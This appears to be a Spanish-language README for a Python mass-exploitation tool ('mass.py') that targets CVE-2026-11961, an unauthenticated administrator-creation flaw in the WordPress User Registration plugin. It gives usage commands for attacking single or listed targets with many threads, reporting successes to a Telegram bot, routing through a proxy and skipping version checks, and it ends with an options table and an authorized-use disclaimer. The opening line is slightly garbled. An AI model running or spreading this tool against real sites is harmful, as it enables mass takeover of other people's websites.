
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalada de privilegios. Roles de membresía mal configurados → Creación de administrador no autenticado → Compromiso del sitio. CVSS 8.1
Herramienta de explotación masiva para CVE-2026-11961 que afecta al plugin de WordPress User Registration & Membership.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
Este proyecto se proporciona únicamente para evaluaciones de seguridad autorizadas, investigación defensiva de seguridad y validación de vulnerabilidades.
Al utilizar este software, confirmas que tienes autorización explícita para evaluar los sistemas objetivo. El acceso no autorizado a sistemas informáticos está prohibido y puede violar las leyes aplicables.
El autor y los colaboradores no fomentan ni toleran el uso no autorizado de este proyecto y no asumen responsabilidad ni obligación alguna por el mal uso, daños o consecuencias legales derivados de su utilización.
JohenLastGen JLG NETWORK
| Opción | Descripción |
|---|
-h, --help | Muestra el mensaje de ayuda y sale |
-u, --url | URL de un único objetivo |
-l, --list | Archivo que contiene URLs objetivo (una por línea) |
--username | Nombre de usuario administrador (por defecto: generado aleatoriamente) |
--password | Contraseña de administrador (por defecto: generada aleatoriamente) |
-t, --threads | Número de hilos concurrentes (por defecto: 5) |
--timeout | Tiempo de espera de solicitud en segundos (por defecto: 15) |
-o, --output | Guarda los resultados exitosos en un archivo JSONL |
--log | Guarda los registros de consola en un archivo |
--proxy | Proxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080) |
--force | Omite la validación de versión y continúa el procesamiento |
--tg-token | Token del Bot de Telegram |
--tg-chat | ID del Chat de Telegram |